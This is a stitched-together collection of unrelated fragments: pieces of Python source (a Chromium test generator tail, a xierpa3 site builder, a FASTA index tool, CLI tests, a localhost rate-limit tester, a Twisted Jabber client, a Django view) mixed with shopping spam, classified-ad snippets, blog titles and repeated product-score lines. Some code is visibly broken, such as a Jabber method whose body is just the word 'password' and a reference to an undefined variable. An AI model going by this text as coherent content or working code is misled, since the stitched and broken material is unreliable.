test_file_prefix="tests_change_b",
test_fixture="TwoClientWebAppsIntegrationSyncTest")
]
default_partition = TestPartitionDescription(
action_name_prefixes=set(),
browsertest_dir=TEST_DATA_DIR,
test_file_prefix="tests_default",
test_fixture="WebAppIntegrationBrowserTest")
with open(actions_filename) as actions_file, \
open(coverage_filename) as coverage_file, \
tempfile.TemporaryDirectory() as output_dir:
capturedOutput = StringIO()
sys.stdout = capturedOutput
generate_framework_tests_and_coverage(actions_file, coverage_file,
custom_partitions,
default_partition,
output_dir, None)
# The framework uses stdout to inform the developer of tests that
# need to be added or removed. Since there should be no tests
# changes required, nothing should be printed to stdout.
self.assertFalse(capturedOutput.read())
sys.stdout = sys.__stdout__
for platform in TestPlatform:
file_title = "coverage" + platform.suffix + ".tsv"
gen_coverage_filename = os.path.join(output_dir, file_title)
expected_coverage_filename = os.path.join(
TEST_DATA_DIR, "expected_" + file_title)
with open(gen_coverage_filename) as coverage_file, \
open(expected_coverage_filename) as expected_file:
self.assertListEqual(list(coverage_file.readlines()),
list(expected_file.readlines()))
if __name__ == '__main__':
unittest.main()
|
On location at one of the airports we got the idea for this cover art. It had all the elements we wanted and to capture the feel we so visioned only toke a few hours of waiting. Waiting for just that right moment.
A wide range of airplanes took of this day and as we where wrapping up we decided to take one last picture - luck was on our side as it was the night flight to Beijing. Big plane, happy photographer; happy photographer equals great art work!
The elements needed was then composed together and retusched and the end result was a stunning art work with colors and a powerful message.
For this release we also packed a full social media coverage with Facebook banners, Instagram photos and a video for Youtube. |
# -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# make.py
#
# Demo site for the simple "BasicWebsite" example.
# Each of the builders takes the information from the theme to build its
# own type of file.
#
import webbrowser
from xierpa3.attributes import Color, Em, Perc
from xierpa3.components import Theme, Page, Column, Logo, Menu, MobileNavigation, Container, Article, \
ArticleSideBar, Footer, FeaturedByImage, FeaturedByDiapText, FeaturedByText, FeaturedByImageList, \
ArticlesList, PosterHead
from xierpa3.descriptors.blueprint import BluePrint
from xierpa3.descriptors.media import Media
from xierpa3.toolbox.transformer import TX
from xierpa3.adapters.textilefileadapter import TextileFileAdapter
# Load @fontface fonts for this example from www.webtype.com
BODYFAMILY = '"Benton Sans RE", Verdana, sans'
HEADFAMILY = '"Hermes FB Semibold", Impact, Verdana, sans'
class Top(Container):
BLUEPRINT = BluePrint(MobileNavigation.BLUEPRINT,
# Layout alternatives
backgroundColor=Color('#fff'), doc_backgroundColor='Top background color.',
)
class Navigation(Column):
def buildBlock(self, b):
b.div(class_='navigation', marginbottom=Em(2), paddingright=Em(1), backgroundcolor=Color('#EEE'))
for article in self.adapter.getRankedArticles():
if article.title:
b.a(href='/article-%s' % article.id, fontsize=Em(0.8), marginright=Em(1), color=Color('#888'))
b.text(article.title)
b._a()
else:
b.text('No title for article "%s"' % article.id)
b.br()
b._div()
class DbdWebsite(Theme):
u"""The *DbdWebsite* generates the DoingByDesign website from a given adapter with all navigation
and content in place. The styling is not different from default (no additional styling added,
except what is already defined the @component.BLUEPRINT@."""
C = Theme.C
TITLE = u'Doing by Design' # Use as title of window.
XIERPA3_DEMOFONTS = "//cloud.webtype.com/css/34d3e5fe-7dee-4122-9e87-ea5ee4a90a05.css"
URL_FONTS = [
# Note that this package contains the a set of latest featured font, and may be changed in the future.
# If using the font in this package, safest is to refer to the functional constant names below,
# instead of making a direct reference to the family name.
# Of course, taking your own account at //www.webtype.com is even better :)
XIERPA3_DEMOFONTS, # Webtype @fontface fonts, to be used for localhost demo purposes.
]
# The single column is filled by the self.adapter article query result and standard navigation.
# The default b.adapter taks the articles from the DbD site.
def baseStyle(self):
u"""Answer the single basis style that will be defined as overall CSS, before
specific block definitions start."""
s = Article.BLUEPRINT
root = self.newStyle() # Create root style
root.addStyle('body', fontfamily=BODYFAMILY, fontsize=s.fontSize,
backgroundcolor=s.pageBackgroundColor, lineheight=s.lineHeight)
s.addStyle('h1, h2, h3, h4, h5, p.lead', fontfamily=HEADFAMILY)
s.addStyle('h6', fontfamily=BODYFAMILY)
s.addStyle('b', fontweight=self.C.BOLD)
s.addStyle('a', color=Color('#CECECE'))
return root
def getSiteAdapter(self):
u"""Answer the adapter for this site, including all articles of the DbD site."""
from xierpa3.sites import doingbydesign
# Root path where to find the article Simples wiki file for this example page.
articleRoot = TX.module2Path(doingbydesign) + '/files/articles/'
return TextileFileAdapter(articleRoot) # Preferred adapter class for articles in this site.
def baseComponents(self):
u"""Create a theme site with just one single template home page. Answer a list
of page instances that are used as templates for this site."""
# Create an instance (=object) of components to be placed on the page.
# Import current example site, as anchor for the article files.
adapter = self.getSiteAdapter()
logo = Logo()
menu = Menu()
navigation = Navigation()
article = Article(showPoster=False) # No poster inside the article. We use the PosterHead component.
articleSideBar = ArticleSideBar(showChapterNavigation=True)
articlesList = ArticlesList()
posterhead = PosterHead() # Wordpress-like big picture from article.poster link.
featuredByImage = FeaturedByImage()
featuredByDiapText = FeaturedByDiapText()
featuredByText = FeaturedByText()
featuredByImageList = FeaturedByImageList()
# Containers for pages
top = Top(components=(logo, menu), media=Media(max=self.C.M_MOBILE_MAX, display=self.C.NONE))
homeContainer = Container(components=(featuredByDiapText, featuredByImage, featuredByText,
featuredByImageList))
articleContainer = Container(components=(posterhead, article, articleSideBar))
articlesListContainer = Container(articlesList,)
footer = Footer()
# Create an instance (=object) of the page, containing the navigation components.
# The class is also the page name in the url.
homePage = Page(class_=self.C.TEMPLATE_INDEX, components=(top, homeContainer, footer), adapter=adapter,
title=self.TITLE, fonts=self.URL_FONTS)
articlePage = Page(class_=self.C.TEMPLATE_ARTICLE, components=(top, articleContainer, footer), adapter=adapter,
title=self.TITLE, fonts=self.URL_FONTS)
articlesPage = Page(class_=self.C.TEMPLATE_ARTICLES, components=(top, articlesListContainer, footer),
adapter=adapter, title=self.TITLE, fonts=self.URL_FONTS)
# Answer a list of types of pages for this site. In this case just one template.
return [homePage, articlePage, articlesPage]
|
"Justins Gift" True Story. . .
How Great The Love Of Wildheart!
REPOST. from 2006 Even On Bad Days Some Good Can Come.
EVER WONDER WHERE THE MAGIC OF CHRISTMAS DISAPPEARS TO ?
THE RIDE ON PAINTED HORSE!
PROSE~~~KIDS DO THE DARNEDESS THINGS!!!! |
#!/usr/bin/env python2
desc="""FastA index (.fai) handler compatible with samtools faidx (http://www.htslib.org/doc/faidx.html).
.fai is extended with 4 columns storing counts for A, C, G & T for each sequence.
"""
epilog="""Author: [email protected]
Bratislava, 15/06/2016
"""
import os, sys
from datetime import datetime
def symlink(file1, file2):
"""Create symbolic link taking care of real path."""
if not os.path.isfile(file2):
# check if need for absolute path
file1abs = os.path.join(os.path.realpath(os.path.curdir), file1)
if os.path.isfile(file1abs):
os.symlink(file1abs, file2)
# otherwise create symbolic link without full path
else:
os.symlink(file1, file2)
class FastaIndex(object):
"""Facilitate Fasta index (.fai) operations compatible
with samtools faidx (http://www.htslib.org/doc/faidx.html).
"""
def __init__(self, handle, verbose=0, log=sys.stderr):
""" """
ext = ".fai"
self.verbose = verbose
self.log = log.write
self.genomeSize = 0
self.whitespaces_in_headers = False
# guess handle
if type(handle) is str and os.path.isfile(handle):
handle = open(handle)
if type(handle) is file:
if handle.name.endswith(('.gz','.bz')):
raise Exception("Compressed files are currently not supported!")
self.handle = handle
else:
sys.stderr.write("[ERROR] Couldn't guess handle for %s\n"%str(handle))
sys.exit(1)
self.fasta = self.handle.name
self.faidx = self.fasta + ext
# check if fasta is symlink
if not os.path.isfile(self.faidx) and os.path.islink(self.fasta):
_fasta = os.path.realpath(self.fasta)
_faidx = _fasta+ext
# symlink faidx if faidx exists and linked fasta is older than its faidx
if os.path.isfile(_faidx) and os.stat(_fasta).st_mtime < os.stat(_faidx).st_mtime:
symlink(_faidx, self.faidx)
# create new index if no .fai, .fai loading failed or .fai younger than .fasta
if not os.path.isfile(self.faidx) or not self._load_fai() or \
os.stat(self.fasta).st_mtime > os.stat(self.faidx).st_mtime:
self._generate_index()
# links
self.get = self.get_fasta
# init storage
self.base2rc= {"A": "T", "T": "A", "C": "G", "G": "C",
"a": "t", "t": "a", "c": "g", "g": "c",
"N": "N", "n": "n"}
# basecounts
self.basecounts = map(sum, zip(*[stats[-4:] for stats in self.id2stats.itervalues()]))
self.Ns = self.genomeSize - sum(self.basecounts)
def __process_seqentry(self, out, header, seq, offset, pi):
"""Write stats to file and report any issues"""
if header:
# get seqid and sequence stats
seqid = self.get_id(header)
# catch empty headers
if not seqid:
self.log("[WARNING] No header at line: %s\n"%", ".join(map(str, (pi,seqid,header))))
return
stats = self.get_stats(header, seq, offset)
# warn about empty sequences
if not stats[0]:
self.log("[WARNING] No sequence for: %s at line: %s\n"%(seqid, pi))
# catch duplicates
if seqid in self.id2stats:
self.log("[WARNING] Duplicated sequence ID: %s at line: %s\n"%(seqid, pi))
self.id2stats[seqid] = stats
out.write("%s\t%s\n"%(seqid, "\t".join(map(str, stats))))
def _generate_index(self):
"""Return fasta records"""
if self.verbose:
self.log("Generating FastA index...\n")
header, seq = "", []
offset = pi = 0
self.id2stats = {}
with open(self.faidx, 'w') as out:
for i, l in enumerate(iter(self.handle.readline, ''), 1):
if l.startswith(">"):
self.__process_seqentry(out, header, seq, offset, pi)
# mark that there is whitespace in headers
if len(l[:-1].split())>1:
self.whitespaces_in_headers = True
header = l
offset = self.handle.tell()
seq = []
pi = i
else:
seq.append(l)
# process last entry
self.__process_seqentry(out, header, seq, offset, pi)
def _load_fai(self):
"""Load stats from faidx file.
Return False if .fai is wrongly formatted.
"""
self.id2stats = {}
for l in open(self.faidx):
ldata = l[:-1].split('\t')
if len(ldata)<9:
self.whitespaces_in_headers = False
return
rid = ldata[0]
stats = map(int, ldata[1:])
self.id2stats[rid] = stats
# update genomeSize
self.genomeSize += stats[0]
if len(rid.split())>1:
self.whitespaces_in_headers = True
return True
def __len__(self):
"""How many records are there?"""
return len(self.id2stats)
def __iter__(self):
"""Iterate over the keys."""
for seqid in self.id2stats:
yield seqid
def __getitem__(self, key, start=None, stop=None, name=None, seqonly=False):
"""x.__getitem__(y) <==> x[y]"""
if key not in self.id2stats:
#raise KeyError
sys.stderr.write("[Warning] No such entry: %s\n"%key)
return ""
# get offset info
size, offset, linebases, linebytes = self.id2stats[key][:4]
# compute bytes to fetch
linediff = linebytes - linebases
seqid = key
# get sequence slice
if start and stop:
reverse_complement = 0
if start<1:
start = 1
seqid = "%s:%s-%s"%(key, start, stop)
if start>stop:
reverse_complement = 1
start, stop = stop, start
if stop > size:
stop = size
# 1-base, inclusive end
start -= 1
# get bytesize and update offset
offset += start / linebases * linebytes + start % linebases
realsize = stop-start
bytesize = realsize / linebases * linebytes + realsize % linebases
# read sequence slice
self.handle.seek(offset)
seq = self.handle.read(bytesize).replace('\n', '')
if reverse_complement:
seq = self.get_reverse_complement(seq)
if seqonly:
return seq
# format lines
seq = '\n'.join(seq[i:i+linebases] for i in range(0, len(seq), linebases))+'\n'
# load whole sequence record
else:
# get bytesize
bytesize = size / linebases * linebytes + size % linebases
## add line diff for last line only for multiline fasta if last line is not complete
if size / linebytes and size % linebases:
bytesize += linediff
# read entire sequence
self.handle.seek(offset)
seq = self.handle.read(bytesize)
if seqonly:
return "".join(seq.split('\n'))
# update name
if not name:
name = seqid
record = ">%s\n%s"%(name, seq)
return record
def get_reverse_complement(self, seq):
"""Return reverse complement"""
rc = []
for seqsegment in seq.split():
for b in seqsegment:
if b in self.base2rc:
rc.append(self.base2rc[b])
else:
rc.append(b)
return "".join(reversed(rc))
def get_sequence(self, contig, reverse=False):
"""Return sequence of given contig"""
seq = self.__getitem__(contig, seqonly=True)
if reverse:
return self.get_reverse_complement(seq)
return seq
def get_fasta(self, region="", contig="", start=None, stop=None, name=None):
"""Return FastA slice"""
if region:
if ':' in region:
#if '-' in region:
try:
contig, startstop = region.split(':')
start, stop = map(int, startstop.split('-'))
except Exception:
raise Exception("Malformed region definition: %s, while expected contig:start-stop"%region)
else:
contig = region
elif not contig:
self.log("Provide region or contig!\n")
return
# get record
record = self.__getitem__(contig, start, stop, name)
return record
def get_id(self, header):
"""Return seqid from header"""
# catch empty headers
if len(header.strip())<2:
return
return header[1:].split()[0]
def get_stats(self, header, seq, offset):
"""Return seq length, offset, linebases, linebyts and number of
A, C, G and T in each sequence.
Compatible with samtools faidx (http://www.htslib.org/doc/faidx.html).
"""
errors = 0
# get bases & bytes in line, ignoring last line
if len(seq)>1:
linebases = set(len(s.strip()) for s in seq[:-1])
linebytes = set(len(s) for s in seq[:-1])
if len(linebases)>1:
self.log("[WARNING] Uneven line lengths in %s: %s\n"%(header, ",".join(map(str, linebases))))
linebases, linebytes = max(linebases), max(linebytes)
elif len(seq)==1:
linebases, linebytes = len(seq[0].strip()), len(seq[0])
# handle empty sequences https://github.com/lpryszcz/redundans/issues/13
else:
linebases, linebytes = 60, 61 #len(seq[0].strip()), len(seq[0])
seq = "".join(s.strip() for s in seq)
seqlen = len(seq)
self.genomeSize += seqlen
# count ACGT
bases = {'A': 0, 'C': 0, 'G': 0, 'T': 0, 'N': 0}
for b in seq.upper():
if b in bases:
try:
bases[b] += 1
except:
errors += 1
return (seqlen, offset, linebases, linebytes, \
bases['A'], bases['C'], bases['G'], bases['T'])
def sort(self, reverse=1, minLength=0, genomeFrac=0):
"""Return list of contigs sorted by descending size (reverse=1).
The list of returned contigs can be limited by:
- minLength - return contigs longer than bases [0]
- genomeFrac - return the longest contigs until genomeFrac is reached [all]
"""
# get all contigs
contigs = self.id2stats.keys()
contigi = len(contigs)
# filter by contig length
if minLength:
contigs = filter(lambda x: self.id2stats[x][0]>=minLength, self.id2stats)
# sort by descending size
sorted_contigs = sorted(contigs, key=lambda x: self.id2stats[x][0], reverse=reverse)
# filter longest contigs by genome fraction
if genomeFrac:
totsize = 0
for contigi, c in enumerate(sorted_contigs, 1):
totsize += self.id2stats[c][0]
if totsize >= genomeFrac*self.genomeSize:
break
return sorted_contigs[:contigi]
def get_N_and_L(self, genomeFrac=0.5, return_L=False, genomeSize=None):
"""Return N50 (and L50 if return_L) of given FastA.
- genomeFrac - calculate N (and L) for this fraction of genome [0.5 for N50 & L50]
- return NL - return N50 (contig size) and L50 (number of contigs) [False]
- genomeSize - if provided, it will use this size of the genome
instead of size of give assembly
"""
if not genomeSize:
genomeSize = self.genomeSize
# parse contigs by descending size
totsize = 0
for i, x in enumerate(sorted(self.id2stats.itervalues(), reverse=True), 1):
size = x[0]
totsize += size
if totsize >= genomeFrac*genomeSize:
break
# return N & L
if return_L:
return size, i
# return just N
return size
def N90(self):
"""Return N90"""
return self.get_N_and_L(0.9)
def L90(self):
"""Return N90"""
return self.get_N_and_L(0.9, return_L=True)[1]
def N50(self):
"""Return N90"""
return self.get_N_and_L()
def L50(self):
"""Return N90"""
return self.get_N_and_L(return_L=True)[1]
def GC(self):
"""Return GC and number of Ns"""
# catch errors ie. empty files
#if len(basecounts) != 4:
# return "%s\t[ERROR] Couldn't read file content\n"%handle.name
(A, C, G, T) = self.basecounts
GC = 100.0*(G + C) / sum(self.basecounts)
return GC
def stats(self):
"""Return FastA statistics aka fasta_stats"""
if not self.id2stats:
return "[WARNING] No entries found!\n"
longest = max(stats[0] for stats in self.id2stats.itervalues())
lengths1000 = [x[0] for x in self.id2stats.itervalues() if x[0]>=1000]
contigs1000 = len(lengths1000)
_line = '%s\t%s\t%s\t%.3f\t%s\t%s\t%s\t%s\t%s\t%s\n'
line = _line % (self.fasta, len(self), self.genomeSize, self.GC(), contigs1000, sum(lengths1000),
self.N50(), self.N90(), self.Ns, longest)
return line
def main():
import argparse
usage = "%(prog)s -i " #usage=usage,
parser = argparse.ArgumentParser(description=desc, epilog=epilog, \
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--version', action='version', version='0.11c')
parser.add_argument("-v", "--verbose", default=False, action="store_true",
help="verbose")
parser.add_argument("-i", "--fasta", type=file,
help="FASTA file(s)")
parser.add_argument("-o", "--out", default=sys.stdout, type=argparse.FileType('w'),
help="output stream [stdout]")
parser.add_argument("-r", "--regions", nargs='*', default=[],
help="contig(s) or contig region(s) to output (returns reverse complement if end larger than start)")
parser.add_argument("-N", default=0, type=int,
help="calculate NXX and exit ie N50")
parser.add_argument("-L", default=0, type=int,
help="calculate LXX and exit ie L50")
parser.add_argument("-S", "--stats", default=False, action="store_true",
help="return FastA stats aka fasta_stats")
o = parser.parse_args()
# print help if no parameters
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if o.verbose:
sys.stderr.write("Options: %s\n"%str(o))
# init faidx
faidx = FastaIndex(o.fasta, o.verbose)
# report N & L
if o.N:
o.out.write("%s\n"%faidx.get_N_and_L(o.N/100.))
if o.L:
o.out.write("%s\n"%faidx.get_N_and_L(o.L/100., return_L=True)[1])
# fasta_stats
if o.stats:
o.out.write(faidx.stats())
# report regions
for region in o.regions:
o.out.write(faidx.get_fasta(region))
if __name__=='__main__':
t0 = datetime.now()
try:
main()
except KeyboardInterrupt:
sys.stderr.write("\nCtrl-C pressed! \n")
except IOError as e:
sys.stderr.write("I/O error({0}): {1}\n".format(e.errno, e.strerror))
#[Errno 95] Operation not supported
except OSError:
sys.stderr.write("OS error({0}): {1}\n".format(e.errno, e.strerror))
dt = datetime.now()-t0
sys.stderr.write("#Time elapsed: %s\n"%dt)
|
Find great deals on eBay for stainless steel bbq plate. Shop with confidence.
Topnotch™ barbeque plates and baking dishes are manufactured from a special grade of heat transferring stainless steel. It is the composition of the material which gives the Topnotch™ Stainless Steel Hot Plates the special ability to transfer and retain heat as well as being corrosion resistant.
The Matador Stainless Steel BBQ Scraper is made from quality, long lasting, easy-to-clean stainless steel with a robust, soft grip rubber coated handle. The Matador BBQ Grillsmart Hotplate and Grill Cleaner has been designed to make cleaning the bars of your grill and the surface of your hotplates as quick, easy and effective as possible.
Amazon: stainless steel heat plates. SHINESTAR Grill Parts, 3-Pack Universal BBQ Heat Shield Extend from 11 3/4" to 21", Adjustable Grill Heat Tent, Gas Grill Replacement Parts for Char-Broil, Brinkmann, Kenmore,Backyard Grill Heat Plate. by SHINESTAR. $16.99 $ 16 99 Prime.
We've got a massive range Stainless Steel, Satin Enamal & Cast Iron BBQ plates for your BBQ. View our range & replace or upgrade today!
BBQ Grills/Hotplates Gallery View List View Sort By: Cast Iron BBQ Grill - 4 burner Cast Iron BBQ Grill replacement $59.95 More Info Multi-purpose Stainless Steel BBQ Spit Grill Rack for use with BBQ, spit or oven or as a cooling rack. 530mm x 325mm $30.00 More Info. In Stock. M929.
Topnotch™ barbeque plates are manufactured from a special grade of heat transferring stainless steel. It is the composition of the material which gives the Topnotch™ Stainless Steel Hot Plates the special ability to transfer and retain heat as well as being corrosion resistant.
Weber 3-burner Propane Gas Bbq Grill Stainless Steel Builtin Thermometer Outdoor $1,006.99. Weber Grills 13 Piece Stainless Steel Flavor Bars Heat Plates 1000 Model 93801 $94.99. 3/8" Stainless Charcoal Grate For Weber Go Anywhere Grill /custom For Richknyc $100.00.
Product Description. Upgrade or replace your existing premium hotplates with these top of the range stainless steel hotplates from Gasmate. Made from premium stainless steel, these hotplates distribute heat better than any other hotplate material, are the easiest to clean and maintain, and will outlast anything else on the market.
Bbq Grill Heat Plates Weber Stainless Steel Flavorizer Bars Bcp65902-7535 Oem $124.98. Weber State University Ladies Stainless Steel And Gold Tone Watch $126.50. Weber Grill Tools Plated-steel Hinged Cooking Grate 22" & 18" Lot X8 $149.99.
This stainless steel electric grill features removable, dishwasher safe plates. It’s also got a “barbecue mode” that’s meant to help create the most authentic barbecue meals. The Smart Grill allows you to sear meat indoors at a high consistent, making it ideal for turkey or chicken.
STAINLESS STEEL BBQ GRILL HOT PLATE 46.5 X 38CM PREMIUM 304 GRADE Our top-of-the-line stainless steel BBQ grill and hot plate will make backyard cooking an absolute pleasure! Toss out that old cast iron grill and move up in life.
The plates should be big enough to protect the burners and vaporize enough meat drippings. Check your grill's owner's manual or simply use a tape measurer to find the length, width and height of the burners. Gas grill heat plates come in stainless steel, porcelain and porcelain coated stainless steel.
Check out our range of BBQ Spare Parts products at your local Bunnings Warehouse. Visit us today for the widest range of Accessories products. Gasmate Stainless Steel BBQ Rail Burner - 2 Pack. Order Online. Fulfilled by: Appliances Online. Delivery Available. Pick up in-store $ 19.89. Compare .
Making breakfast on your grill is possible with this Lynx GP Griddle Plate. The perfect outdoor kitchen accessory, this griddle is made of thick stainless steel for durability and easy cleaning and delivers consistent heat across the surface. The four feet firmly grip the grill grates so the plate will not shift while scrambling or flipping.
Gasmaster Hero Twin Hood BBQ Kitchen (New) Brand New In Box Top of the Range 304 Grade Stainless Steel This BBQ Kitchen is perfect for every occasion, from a quiet dinner for two on a weeknight to a big Saturday BBQ with friends and family. |
# coding: utf-8
"""Tests for ogre.cli"""
from __future__ import absolute_import
import random
import pytest
import ogre.cli
@pytest.fixture
def source():
"""Return a valid source."""
return random.choice(['twitter'])
# pylint: disable=redefined-outer-name
def test___main__():
"""Test python -m functionality."""
with pytest.raises(SystemExit) as excinfo:
import ogre.__main__ # pylint: disable=redefined-outer-name, unused-variable
assert excinfo.value != 0
def test_empty():
"""Test invocation with no arguments."""
with pytest.raises(SystemExit) as excinfo:
ogre.cli.main()
assert excinfo.value != 0
def test_no_credentials(source):
"""Test an invocation without API keys."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source])
assert excinfo.value != 0
def test_invalid_keys(source):
"""Test an invocation with invalid API keys."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '--keys', 'invalid'])
assert excinfo.value != 0
def test_invalid_location(source):
"""Test an invocation with an invalid location."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '-l', '0', '0', 'invalid', 'km'])
assert excinfo.value != 0
def test_invalid_interval(source):
"""Test an invocation with an invalid interval."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '-i', '0', 'invalid'])
assert excinfo.value != 0
def test_invalid_limit(source):
"""Test an invocation with an invalid limit."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '--limit', 'invalid'])
assert excinfo.value != 0
def test_invalid_log(source):
"""Test an invocation with an invalid log."""
with pytest.raises(AttributeError) as excinfo:
ogre.cli.main(['-s', source, '--log', 'invalid'])
assert excinfo.value != 0
|
P195 65r15 Tires | Kijiji in Saint John. - Buy, Sell & Save with Canada's #1 Local Classifieds.
Get an alert with the newest ads for "p195 65r15 tires" in Saint John. |
from __future__ import division
from time import sleep
import httplib2
import json
h = httplib2.Http()
url = raw_input("Please enter the uri you want to access, \n"
"If left blank the connection will be set to "
"'http://localhost:5000/rate-limited': ")
if url == '':
url = 'http://localhost:5000/rate-limited'
req_per_minute = float(raw_input("Please specify the number "
"of requests per minute: "))
interval = (60.0 / req_per_minute)
def SendRequests(url, req_per_minute):
requests = 0
while requests < req_per_minute:
result = json.loads(h.request(url, 'GET')[1])
# result = h.request(url,'GET')[1]
# print result
if result.get('error') is not None:
print "Error #%s : %s" % (result.get('error'), result.get('data'))
print "Hit rate limit. Waiting 5 seconds and trying again..."
sleep(5)
SendRequests(url, req_per_minute)
else:
print "Number of Requests: ", requests+1
print result.get('response')
requests = requests + 1
sleep(interval)
print "Sending Requests..."
SendRequests(url, req_per_minute)
|
This product has a FreakScore of 4.6 su 10 based on 85 scores.
This product has a FreakScore of 4.6 su 10 based on 188 scores.
This product has a FreakScore of 4.6 su 10 based on 60 scores.
This product has a FreakScore of 4.6 su 10 based on 46 scores.
This product has a FreakScore of 4.6 su 10 based on 1491 scores.
This product has a FreakScore of 4.6 su 10 based on 1774 scores.
This product has a FreakScore of 4.5 su 10 based on 48 scores.
This product has a FreakScore of 4.5 su 10 based on 778 scores.
This product has a FreakScore of 4.5 su 10 based on 103 scores.
This product has a FreakScore of 4.5 su 10 based on 286 scores.
This product has a FreakScore of 4.5 su 10 based on 326 scores.
This product has a FreakScore of 4.5 su 10 based on 81 scores.
This product has a FreakScore of 4.5 su 10 based on 2025 scores.
This product has a FreakScore of 4.5 su 10 based on 650 scores.
This product has a FreakScore of 4.5 su 10 based on 28 scores.
This product has a FreakScore of 4.5 su 10 based on 280 scores.
This product has a FreakScore of 4.5 su 10 based on 267 scores.
This product has a FreakScore of 4.4 su 10 based on 526 scores.
This product has a FreakScore of 4.4 su 10 based on 48 scores.
This product has a FreakScore of 4.4 su 10 based on 1748 scores.
This product has a FreakScore of 4.4 su 10 based on 174 scores. |
# -*- coding: utf-8 -*-
##Copyright (C) [2009] [Jürgen Hamel, D-32584 Löhne]
##This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as
##published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version.
##This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
##warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
##for more details.
##You should have received a copy of the GNU General Public License along with this program; if not, write to the
##Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#from twisted.web import xmlrpc
import sys,os,string,threading,time,curses
from time import strftime
import xmlrpclib
from twisted.internet.protocol import Protocol
from twisted.words.protocols.jabber import client, jid, xmlstream
from twisted.words.xish import domish
from twisted.words.xish.domish import Element
from cuon.TypeDefs.constants import constants
import time
import shelve
class xmpp_client(constants):
def __init__(self, userjid, password):
constants.__init__(self)
self.filename = 'dic_jabberusers'
self.me = jid.JID(userjid)
self.juser = userjid
self.factory = client.basicClientFactory(self.me, password)
#self.Server = xmlrpclib.ServerProxy(self.XMLRPC_PROTO + '://' + self.XMLRPC_HOST + ':' + `self.XMLRPC_PORT`)
self.theXmlstream = None
self.dicUsers = {}
self.factory.addBootstrap('//event/stream/authd',self.authd)
# Authorized
def authd(self, xmlstream):
# need to send presence so clients know we're
# actually online.
print 'start authd'
presence = domish.Element(('jabber:client', 'presence'))
presence.addElement('status').addContent('Online')
self.theXmlstream = xmlstream
self.theXmlstream.send(presence)
self.theXmlstream.addObserver('/message', self.gotMessage)
print 'new xmlstream = ', self.theXmlstream
def create_reply(self, elem):
""" switch the 'to' and 'from' attributes to reply to this element """
# NOTE - see domish.Element class to view more methods
msg_frm = elem['from']
msg_to = elem['to']
message = domish.Element(('jabber:client','message'))
message["to"] = msg_frm
message["from"] = msg_to
message["type"] = "chat"
return message
def buildProtocol(self, addr):
print 'Connected.'
return Echo()
def send(self, to, body, subject=None, mtype=None, delay=None):
print 'start sending'
el = Element((None, "message"))
el.attributes["to"] = to
el.attributes["from"] = self.juser
el.attributes["id"] = '111111'
if(subject):
subj = el.addElement("subject")
subj.addContent(subject)
if(mtype):
el.attributes["type"] = mtype
if(delay):
x = el.addElement("x")
x.attributes["xmlns"] = "jabber:x:delay"
x.attributes["from"] = fro
x.attributes["stamp"] = delay
b = el.addElement("body")
b.addContent(body)
self.theXmlstream.send(el)
print 'done sending'
def gotMessage(self, message):
# sorry for the __str__(), makes unicode happy
print u"from1: %s" % message["from"]
send_from = message["from"].strip()
self.displayMessage(send_from, message)
def displayMessage(self, send_from, message):
password
def getTime(self):
return time.strftime(self.liTimes['hour24'],time.localtime())
|
Get an alert with the newest ads for Clothing - 0-3 Months in Lloydminster.
0-3 month lot and 3-6 month lot. $60 takes it all (both lots). Most items are from carters, some worn once, some worn not at all!
Post your classified or want ad in Lloydminster Clothing - 0-3 Months. It's fast and easy. |
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.template import Context, loader
from google.appengine.api import users
from userprefs.models import *
from clubs.models import Club
import logging
def index(request):
user = users.get_current_user()
club = None
phone = ""
if not user:
auth_url = users.create_login_url(request.path + '/prefs')
else:
auth_url = users.create_logout_url(request.path)
userPrefs = get_userprefs(user.user_id())
logging.info('userPrefs index: get_userprefs returns %s' % userPrefs)
if userPrefs:
logging.info('userPrefs: %s' % (userPrefs,))
club = userPrefs.club
phone = userPrefs.phone
else:
# should we ever get here? We should always get a userPref but version of prefs may be 0.
logging.info('userPrefs: no record yet. Why here??')
clubList = Club.objects.all().order_by('Number')
t = loader.get_template('userprefs/index.html')
c = RequestContext(request, {
'user': user,
'auth_url': auth_url,
'club': club,
'phone': phone,
'clubList' : clubList
})
return HttpResponse(t.render(c))
def update(request):
try:
user = users.get_current_user()
clubNumber = request.POST['clubNumber']
phoneNumber = request.POST['phoneNumber']
except ():
#
return render_to_response('prefs/index.html', {
'error_message': "Prefs update failed.",
}, context_instance=RequestContext(request))
else:
logging.info('Save UserPrefs: club=['+clubNumber+'], phoneNumber=['+phoneNumber+'], gid=['+user.user_id()+']')
newUserPrefs = UserPrefs(version=1,club=clubNumber,phone=phoneNumber,googleOpenId=user.user_id())
newUserPrefs.save()
# messages.success(request, 'Add')
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('userprefs.views.index'))
# return HttpResponse('Test') |
Big Cat Solutions has some of the most detailed reporting capabilities available to your organization. Our reporting gives our clients the ability to manage their purchases and set budgets. Our Customer Business Review offers an extremely professional analysis of our client’s purchases and our performance as their supplier.
By tailoring this report to meet our client’s needs, we look to bring value to your organization as a proactive partner.
Our experienced professionals can identify cost inefficiencies within your company’s purchasing habits. We can provide you with easy-to-read usage reports that individually break down what you purchase, in what quantity and at what price. We show you your usage sorted contract versus non-contract, and we provide the information (dollar descending) so that you clearly see what percentage of your gross dollars goes to your most often purchased products.
